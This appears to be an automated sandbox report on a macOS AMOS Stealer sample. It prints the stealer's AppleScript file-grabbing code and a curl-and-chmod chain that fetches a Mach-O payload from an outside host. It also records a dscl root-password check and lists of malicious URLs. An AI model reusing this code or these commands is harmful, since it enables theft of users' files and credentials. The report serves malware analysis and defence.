Source: /tmp/update (PID: 620)Shell command executed: sh -c osascript -e 'set release to trueset filegrabbers to trueon filesizer(paths)set fsz to 0tryset theItem to quoted form of POSIX path of pathsset fsz to (do shell script '/usr/bin/mdls -name kMDItemFSSize -raw ' & theItem)end tryreturn fszend filesizeron mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryend FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryend BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon readwrite2(path_to_file, path_as_save)tryset folderPath to do shell script 'dirname ' & quoted form of path_as_savemkdir(folderPath)tell application 'Finder' set sourceFile to POSIX file path_to_file as alias set destinationFolder to POSIX file folderPath as alias duplicate sourceFile to destinationFolder with replacingend tellend tryend readwrite2on isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn trueend ifreturn falseend tryend isDirectoryon GrabFolderLimit(sourceFolder, destinationFolder)tryset bankSize to 0set exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolderLimit(itemPath, savePath)elseset fsz to filesizer(itemPath)set bankSize to bankSize + fszif bankSize < 10 * 1024 * 1024 thenreadwrite(itemPath, savePath)end ifend ifend ifend repeatend tryend GrabFolderLimiton GrabFolder(sourceFolder, destinationFolder)tryset excJump to behavior
Source: /usr/bin/osascript (PID: 625)Shell command executed: sh -c echo $((RANDOM % 9000 + 1000))Jump to behavior
Source: /usr/bin/osascript (PID: 626)Shell command executed: sh -c system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataTypeJump to behavior
Source: /usr/bin/osascript (PID: 631)Shell command executed: sh -c mkdir -p '/tmp/4302'Jump to behavior
Source: /usr/bin/osascript (PID: 632)Shell command executed: sh -c dscl . authonly 'root' ''Jump to behavior
Source: /bin/sh (PID: 619)Chmod executable: /bin/chmod -> chmod +x /tmp/updateJump to behavior
Source: /bin/sh (PID: 616)Curl executable: /usr/bin/curl -> curl -o /tmp/update https://norikosumiya.com/brew/updateJump to behavior
Source: /bin/sh (PID: 622)Pkill executable: /usr/bin/pkill -> pkill TerminalJump to behavior
Source: /bin/sh (PID: 631)Mkdir executable: /bin/mkdir -> mkdir -p /tmp/4302Jump to behavior
Source: /usr/bin/osascript (PID: 624)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 624)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 624)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 624)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plistJump to behavior
Source: /usr/bin/curl (PID: 616)File written: /private/tmp/updateJump to dropped file
Source: /usr/bin/curl (PID: 616)FAT Mach-O written to tmp path: /private/tmp/updateJump to dropped file
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 618)Random device file read: /dev/urandomJump to behavior
Source: /usr/bin/osascript (PID: 624)Random device file read: /dev/randomJump to behavior
Source: /usr/libexec/firmwarecheckers/eficheck/eficheck (PID: 653)Random device file read: /dev/randomJump to behavior
Source: submitted sampleStderr: % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 0 229k 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0 87 229k 87 199k 0 0 94252 0 0:00:02 0:00:02 --:--:-- 94221100 229k 100 229k 0 0 105k 0 0:00:02 0:00:02 --:--:-- 105ksh: line 0: disown: current: no such job: exit code = 0
Source: /usr/bin/osascript (PID: 624)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Source: /usr/bin/xattr (PID: 618)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /usr/bin/osascript (PID: 624)Binary plist file created: /private/var/root/Library/Saved Application State/com.apple.osascript.savedState/windows.plistJump to dropped file
Source: /usr/bin/osascript (PID: 624)Reads from a resource fork: /usr/bin/osascript/..namedfork/rsrcJump to behavior
Source: /usr/sbin/system_profiler (PID: 629)Sysctl read request: hw.model (6.2)Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: /usr/sbin/system_profiler (PID: 627)Csrutil executable: /usr/bin/csrutil /usr/bin/csrutil statusJump to behavior
Source: /usr/bin/osascript (PID: 624)Sysctl read request: kern.safeboot (1.66)Jump to behavior
Source: /usr/sbin/system_profiler (PID: 627)Sysctl read request: kern.safeboot (1.66)Jump to behavior
Source: /usr/bin/osascript (PID: 624)Sysctl read request: hw.availcpu (6.25)Jump to behavior
Source: /usr/sbin/system_profiler (PID: 629)Sysctl read request: hw.cpu_freq (6.15)Jump to behavior
Source: /usr/sbin/system_profiler (PID: 629)Sysctl read request: hw.memsize (6.24)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 618)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 618)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Source: /usr/bin/osascript (PID: 624)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /usr/bin/osascript (PID: 624)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Source: /usr/sbin/system_profiler (PID: 627)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /usr/sbin/system_profiler (PID: 627)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Source: /bin/sh (PID: 615)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 618)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 621)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 623)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/osascript (PID: 624)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 625)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 626)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 631)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 632)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 618)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 618)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /usr/bin/osascript (PID: 624)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /usr/sbin/system_profiler (PID: 627)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior

Stealing of Sensitive Information

barindex
Source: /bin/sh (PID: 624)AMOS Stealer Osscript: osascript -e set release to trueset filegrabbers to trueon filesizer(paths)set fsz to 0tryset theItem to quoted form of POSIX path of pathsset fsz to (do shell script '/usr/bin/mdls -name kMDItemFSSize -raw ' & theItem)end tryreturn fszend filesizeron mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryend FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryend BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon readwrite2(path_to_file, path_as_save)tryset folderPath to do shell script 'dirname ' & quoted form of path_as_savemkdir(folderPath)tell application 'Finder' set sourceFile to POSIX file path_to_file as alias set destinationFolder to POSIX file folderPath as alias duplicate sourceFile to destinationFolder with replacingend tellend tryend readwrite2on isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn trueend ifreturn falseend tryend isDirectoryon GrabFolderLimit(sourceFolder, destinationFolder)tryset bankSize to 0set exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolderLimit(itemPath, savePath)elseset fsz to filesizer(itemPath)set bankSize to bankSize + fszif bankSize < 10 * 1024 * 1024 thenreadwrite(itemPath, savePath)end ifend ifend ifend repeatend tryend GrabFolderLimiton GrabFolder(sourceFolder, destinationFolder)tryset exceptionsJump to behavior
Source: /bin/sh (PID: 632)Security executable: /usr/bin/dscl dscl . authonly rootJump to behavior
Source: /bin/sh (PID: 626)System_profiler executable: /usr/sbin/system_profiler system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataTypeJump to behavior
Source: /usr/sbin/system_profiler (PID: 626)System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPSoftwareDataType -detailLevel fullJump to behavior
Source: /usr/sbin/system_profiler (PID: 626)System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel fullJump to behavior
Source: /usr/sbin/system_profiler (PID: 626)System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPDisplaysDataType -detailLevel fullJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts13
AppleScript		1
Scripting		Path Interception1
Virtualization/Sandbox Evasion		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		1
Exfiltration Over Alternative Protocol		Abuse Accessibility Features
CredentialsDomainsDefault Accounts1
Malicious File		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
Disable or Modify Tools		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
File and Directory Permissions Modification		Security Account Manager1
Account Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Hidden Files and Directories		NTDS161
System Information Discovery		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1594700 Cookbook: defaultmaccmdlinecookbook.jbs Startdate: 19/01/2025 Architecture: MAC Score: 60 57 norikosumiya.com 81.19.135.228, 443, 49356 IVC-ASRU Russian Federation 2->57 59 151.101.131.6, 443, 49388, 49389 FASTLYUS United States 2->59 61 3 other IPs or domains 2->61 11 mono-sgen32 sh 2->11         started        13 xpcproxy nsurlstoraged 2->13         started        15 xpcproxy dirhelper 2->15         started        17 xpcproxy eficheck 2->17         started        process3 process4 19 sh update 11->19         started        21 sh curl 1 11->21         started        24 sh xattr Python 11->24         started        26 sh chmod 11->26         started        file5 28 sh 19->28         started        30 sh 19->30         started        55 /private/tmp/update, Mach-O 21->55 dropped process6 process7 32 sh osascript 3 28->32         started        35 sh pkill 30->35         started        signatures8 63 Detected AMOS Stealer 32->63 65 Executes Apple scripts with very long statement arguments 32->65 37 osascript sh system_profiler 32->37         started        39 osascript sh dscl 32->39         started        42 osascript sh mkdir 32->42         started        44 osascript sh 32->44         started        process9 signatures10 46 system_profiler 37->46         started        49 system_profiler 37->49         started        51 system_profiler 37->51         started        67 Executes the "dscl" command with authonly argument (probably to verify the login password) 39->67 process11 signatures12 69 Executes the "csrutil" command used to retrieve or modify the "System Integrity Protection" configuration 46->69 53 csrutil 46->53         started        process13

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


cam-macmac-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://norikosumiya.com/brew/update0%Avira URL Cloudsafe

Domains and IPs

Download Network PCAP: filteredfull

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
norikosumiya.com
81.19.135.228
truefalse
    		unknown
    gateway.fe2.apple-dns.net
    		17.248.228.69
    		truefalse
      		high
      h3.apis.apple.map.fastly.net
      		151.101.3.6
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://norikosumiya.com/brew/updatefalse
        • Avira URL Cloud: safe
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        81.19.135.228
        		norikosumiya.comRussian Federation
        		24658IVC-ASRUfalse
        151.101.3.6
        		h3.apis.apple.map.fastly.netUnited States
        		54113FASTLYUSfalse
        23.55.204.208
        		unknownUnited States
        		16625AKAMAI-ASUSfalse
        151.101.131.6
        		unknownUnited States
        		54113FASTLYUSfalse
        151.101.67.6
        		unknownUnited States
        		54113FASTLYUSfalse

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        81.19.135.228http://yaocanting.comGet hashmaliciousUnknownBrowse
        • yaocanting.com/
        151.101.3.6https://user-logln.net-protected.net/de/?code=9a7d7f86cffe7c7d6feaede517e284f4Get hashmaliciousUnknownBrowse
          mierda.txt.pyGet hashmaliciousUnknownBrowse
            18037.docGet hashmaliciousUnknownBrowse
              https://docs.google.com/presentation/d/e/2PACX-1vTBMx4bSFDj_B_GCJTdTqUpVgpLXyQPR3uFGYP9j81KKHswOSbzMWDM5ZByYtVAwpACe-iOzHmzehje/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                TelegramGet hashmaliciousUnknownBrowse
                  http://eocf.jyjwohl.ru/KIOJOJMAIEJFLVSF280212193270471103367JIGUHOIIAX4RQ0SVD?beunjabnkfaakr796013636449016227029WA5LIQI5PMNQO0EETORGet hashmaliciousUnknownBrowse
                    https://commandes.maisonetstyles.com/Short/?Verification=aalborz_02@yahoo.comGet hashmaliciousUnknownBrowse
                      https://my.toruftuiov.com/a43a39c3-796e-468c-aae4-b83c862e0918Get hashmaliciousUnknownBrowse
                        CalendlyAppGet hashmaliciousUnknownBrowse
                          ConstateGet hashmaliciousUnknownBrowse
                            23.55.204.208yt-dlp_macosGet hashmaliciousUnknownBrowse
                              151.101.131.6yt-dlp_macosGet hashmaliciousUnknownBrowse
                                Bitcoin-QtGet hashmaliciousUnknownBrowse
                                  rrrGet hashmaliciousUnknownBrowse
                                    CGESrvGet hashmaliciousCobaltStrikeBrowse
                                      https://ivsmn.kidsavancados.com/Get hashmaliciousUnknownBrowse
                                        https://fastbposolutions.com/language/overrides/message.alibaba.com/login.alibaba-com/saexy7ktc4fw1k7zk9xpnx19.phpGet hashmaliciousUnknownBrowse
                                          http://eocf.jyjwohl.ru/KIOJOJMAIEJFLVSF280212193270471103367JIGUHOIIAX4RQ0SVD?beunjabnkfaakr796013636449016227029WA5LIQI5PMNQO0EETORGet hashmaliciousUnknownBrowse
                                            https://commandes.maisonetstyles.com/Short/?Verification=aalborz_02@yahoo.comGet hashmaliciousUnknownBrowse
                                              aJU0obOiEeGet hashmaliciousUnknownBrowse
                                                V6QED2Q1WBYVOPEGet hashmaliciousUnknownBrowse
                                                  151.101.67.6Bitcoin-QtGet hashmaliciousUnknownBrowse
                                                    https://user-logln.net-protected.net/de/?code=9a7d7f86cffe7c7d6feaede517e284f4Get hashmaliciousUnknownBrowse
                                                      mierda.txt.pyGet hashmaliciousUnknownBrowse
                                                        ab_jGet hashmaliciousRust StealerBrowse
                                                          CGESrvGet hashmaliciousCobaltStrikeBrowse
                                                            18037.docGet hashmaliciousUnknownBrowse
                                                              https://docs.google.com/presentation/d/e/2PACX-1vTBMx4bSFDj_B_GCJTdTqUpVgpLXyQPR3uFGYP9j81KKHswOSbzMWDM5ZByYtVAwpACe-iOzHmzehje/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                TelegramGet hashmaliciousUnknownBrowse
                                                                  http://eocf.jyjwohl.ru/KIOJOJMAIEJFLVSF280212193270471103367JIGUHOIIAX4RQ0SVD?beunjabnkfaakr796013636449016227029WA5LIQI5PMNQO0EETORGet hashmaliciousUnknownBrowse
                                                                    https://commandes.maisonetstyles.com/Short/?Verification=aalborz_02@yahoo.comGet hashmaliciousUnknownBrowse

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      h3.apis.apple.map.fastly.netBitcoin-QtGet hashmaliciousUnknownBrowse
                                                                      • 151.101.131.6
                                                                      https://user-logln.net-protected.net/de/?code=9a7d7f86cffe7c7d6feaede517e284f4Get hashmaliciousUnknownBrowse
                                                                      • 151.101.195.6
                                                                      mierda.txt.pyGet hashmaliciousUnknownBrowse
                                                                      • 151.101.3.6
                                                                      rrrGet hashmaliciousUnknownBrowse
                                                                      • 151.101.195.6
                                                                      ab_jGet hashmaliciousRust StealerBrowse
                                                                      • 151.101.3.6
                                                                      CGESrvGet hashmaliciousCobaltStrikeBrowse
                                                                      • 151.101.3.6
                                                                      18037.docGet hashmaliciousUnknownBrowse
                                                                      • 151.101.3.6
                                                                      TelegramGet hashmaliciousUnknownBrowse
                                                                      • 151.101.3.6
                                                                      http://eocf.jyjwohl.ru/KIOJOJMAIEJFLVSF280212193270471103367JIGUHOIIAX4RQ0SVD?beunjabnkfaakr796013636449016227029WA5LIQI5PMNQO0EETORGet hashmaliciousUnknownBrowse
                                                                      • 151.101.131.6
                                                                      https://commandes.maisonetstyles.com/Short/?Verification=aalborz_02@yahoo.comGet hashmaliciousUnknownBrowse
                                                                      • 151.101.3.6

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      IVC-ASRUhttp://yaocanting.comGet hashmaliciousUnknownBrowse
                                                                      • 81.19.135.228
                                                                      5y2VCFOB05.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                      • 81.19.131.103
                                                                      5y2VCFOB05.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                      • 81.19.131.103
                                                                      LxvS6uMf0g.exeGet hashmaliciousAcrid StealerBrowse
                                                                      • 81.19.135.226
                                                                      https://brand.site/896562718995127961820892Get hashmaliciousHTMLPhisherBrowse
                                                                      • 81.19.141.97
                                                                      file.exeGet hashmaliciousDanaBotBrowse
                                                                      • 81.19.137.119
                                                                      81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                      • 81.19.138.213
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog StealerBrowse
                                                                      • 81.19.139.138
                                                                      file.exeGet hashmaliciousAmadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RATBrowse
                                                                      • 81.19.139.138
                                                                      jD6b7MZOhT.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                      • 81.19.139.138
                                                                      FASTLYUSdata.dat.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                      • 185.199.108.133
                                                                      Extreme Injector v3.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                      • 185.199.111.133
                                                                      PgOfRNLIVK.exeGet hashmaliciousLummaC, Amadey, Babadeda, GCleaner, KeyLogger, LummaC Stealer, PureLog StealerBrowse
                                                                      • 185.199.111.133
                                                                      https://nam.dcv.ms/TgEkOrA6UCGet hashmaliciousHTMLPhisherBrowse
                                                                      • 151.101.66.137
                                                                      https://nam.dcv.ms/TgEkOrA6UCGet hashmaliciousHTMLPhisherBrowse
                                                                      • 151.101.2.137
                                                                      https://store.redeemwalletscode.com/redeemwalletcode/gift/307603441Get hashmaliciousUnknownBrowse
                                                                      • 151.101.195.52
                                                                      https://shaiknaziyasulthana.github.io/Amazon.com-Clone/Get hashmaliciousHTMLPhisherBrowse
                                                                      • 185.199.108.153
                                                                      http://case-id-100034393.argentpropertiesvb.com/Get hashmaliciousHTMLPhisherBrowse
                                                                      • 151.101.130.137
                                                                      http://argentpropertiesvb.com/?helpbusiness-100078883Get hashmaliciousHTMLPhisherBrowse
                                                                      • 151.101.194.137
                                                                      http://case-id-100026693.argentpropertiesvb.com/?helpbusiness-100026693Get hashmaliciousHTMLPhisherBrowse
                                                                      • 151.101.2.137
                                                                      AKAMAI-ASUS7KkT51PlxA.exeGet hashmaliciousLummaC, Amadey, Babadeda, GCleanerBrowse
                                                                      • 104.102.49.254
                                                                      PgOfRNLIVK.exeGet hashmaliciousLummaC, Amadey, Babadeda, GCleaner, KeyLogger, LummaC Stealer, PureLog StealerBrowse
                                                                      • 104.102.49.254
                                                                      M1oWYBXUgc.ps1Get hashmaliciousStealc, VidarBrowse
                                                                      • 23.47.27.74
                                                                      cYnteV0WLV.exeGet hashmaliciousStealc, VidarBrowse
                                                                      • 104.102.49.254
                                                                      YxzEGDYnM3.exeGet hashmaliciousStealc, VidarBrowse
                                                                      • 104.102.49.254
                                                                      1BrNyzDvUE.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      RolDDlM8sG.exeGet hashmaliciousStealc, VidarBrowse
                                                                      • 104.102.49.254
                                                                      mXE9EwMkJ7.exeGet hashmaliciousStealc, VidarBrowse
                                                                      • 104.102.49.254
                                                                      https://nam.dcv.ms/TgEkOrA6UCGet hashmaliciousHTMLPhisherBrowse
                                                                      • 184.50.113.41
                                                                      https://nam.dcv.ms/TgEkOrA6UCGet hashmaliciousHTMLPhisherBrowse
                                                                      • 184.50.113.42
                                                                      FASTLYUSdata.dat.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                      • 185.199.108.133
                                                                      Extreme Injector v3.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                      • 185.199.111.133
                                                                      PgOfRNLIVK.exeGet hashmaliciousLummaC, Amadey, Babadeda, GCleaner, KeyLogger, LummaC Stealer, PureLog StealerBrowse
                                                                      • 185.199.111.133
                                                                      https://nam.dcv.ms/TgEkOrA6UCGet hashmaliciousHTMLPhisherBrowse
                                                                      • 151.101.66.137
                                                                      https://nam.dcv.ms/TgEkOrA6UCGet hashmaliciousHTMLPhisherBrowse
                                                                      • 151.101.2.137
                                                                      https://store.redeemwalletscode.com/redeemwalletcode/gift/307603441Get hashmaliciousUnknownBrowse
                                                                      • 151.101.195.52
                                                                      https://shaiknaziyasulthana.github.io/Amazon.com-Clone/Get hashmaliciousHTMLPhisherBrowse
                                                                      • 185.199.108.153
                                                                      http://case-id-100034393.argentpropertiesvb.com/Get hashmaliciousHTMLPhisherBrowse
                                                                      • 151.101.130.137
                                                                      http://argentpropertiesvb.com/?helpbusiness-100078883Get hashmaliciousHTMLPhisherBrowse
                                                                      • 151.101.194.137
                                                                      http://case-id-100026693.argentpropertiesvb.com/?helpbusiness-100026693Get hashmaliciousHTMLPhisherBrowse
                                                                      • 151.101.2.137

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      5c118da645babe52f060d0754256a73cyt-dlp_macosGet hashmaliciousUnknownBrowse
                                                                      • 17.248.228.69
                                                                      • 151.101.131.6
                                                                      • 151.101.67.6
                                                                      Bitcoin-QtGet hashmaliciousUnknownBrowse
                                                                      • 17.248.228.69
                                                                      • 151.101.131.6
                                                                      • 151.101.67.6
                                                                      https://user-logln.net-protected.net/de/?code=9a7d7f86cffe7c7d6feaede517e284f4Get hashmaliciousUnknownBrowse
                                                                      • 17.248.228.69
                                                                      • 151.101.131.6
                                                                      • 151.101.67.6
                                                                      mierda.txt.pyGet hashmaliciousUnknownBrowse
                                                                      • 17.248.228.69
                                                                      • 151.101.131.6
                                                                      • 151.101.67.6
                                                                      rrrGet hashmaliciousUnknownBrowse
                                                                      • 17.248.228.69
                                                                      • 151.101.131.6
                                                                      • 151.101.67.6
                                                                      ab_jGet hashmaliciousRust StealerBrowse
                                                                      • 17.248.228.69
                                                                      • 151.101.131.6
                                                                      • 151.101.67.6
                                                                      CGESrvGet hashmaliciousCobaltStrikeBrowse
                                                                      • 17.248.228.69
                                                                      • 151.101.131.6
                                                                      • 151.101.67.6
                                                                      https://ivsmn.kidsavancados.com/Get hashmaliciousUnknownBrowse
                                                                      • 17.248.228.69
                                                                      • 151.101.131.6
                                                                      • 151.101.67.6
                                                                      18037.docGet hashmaliciousUnknownBrowse
                                                                      • 17.248.228.69
                                                                      • 151.101.131.6
                                                                      • 151.101.67.6
                                                                      https://docs.google.com/presentation/d/e/2PACX-1vTBMx4bSFDj_B_GCJTdTqUpVgpLXyQPR3uFGYP9j81KKHswOSbzMWDM5ZByYtVAwpACe-iOzHmzehje/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                      • 17.248.228.69
                                                                      • 151.101.131.6
                                                                      • 151.101.67.6
                                                                      a7a5e32c2ca29907256b5de4fbdf61edhttps://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFkILOsO1UnLItklUwD68rhtr94fRPJI4HAEjYZ7vdlgHTiHU_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZPRzSyzWe4FlQQyqQA-2BOTqGjWjoN-2BuPm4tzM5LM6f6tO2PXKa74YSjAhzL6onG-2BuKO989bZZj9vupVvXtBWU0qXeI6VZny9p-2FgjssbU9Je1I2RDoZPOLgxX8gxf2-2BzsuoGYoVqnaS5CYR1Z5WEWAcZP0wmQbm4ikqer-2BGrlVppyDdPw-2BxPiObQZTbU2ZeclEy9V5nUC-2BnwlvdDmQwsjghHkHuJFiwInVWpyiCgGFo0uYjlPs3G8hdAgJBJu-2F-2B0K864-3D#ZmluYW5jZUBjbGVhcnZpZXcuYWk=Get hashmaliciousUnknownBrowse
                                                                      • 81.19.135.228
                                                                      extracted-pkg.ziphttps://fluencydirect-distro.s3.amazonaws.com/releases.macOS/FluencyDirect-11.0.10.40.pkgGet hashmaliciousUnknownBrowse
                                                                      • 81.19.135.228
                                                                      Aunteficator-installer-1it5dZOj.pkgGet hashmaliciousUnknownBrowse
                                                                      • 81.19.135.228
                                                                      MacKeeper.6.7.1.pkgGet hashmaliciousUnknownBrowse
                                                                      • 81.19.135.228

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      Process:/usr/bin/osascript
                                                                      File Type:ASCII text, with CR line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1369
                                                                      Entropy (8bit):4.727898989684138
                                                                      Encrypted:false
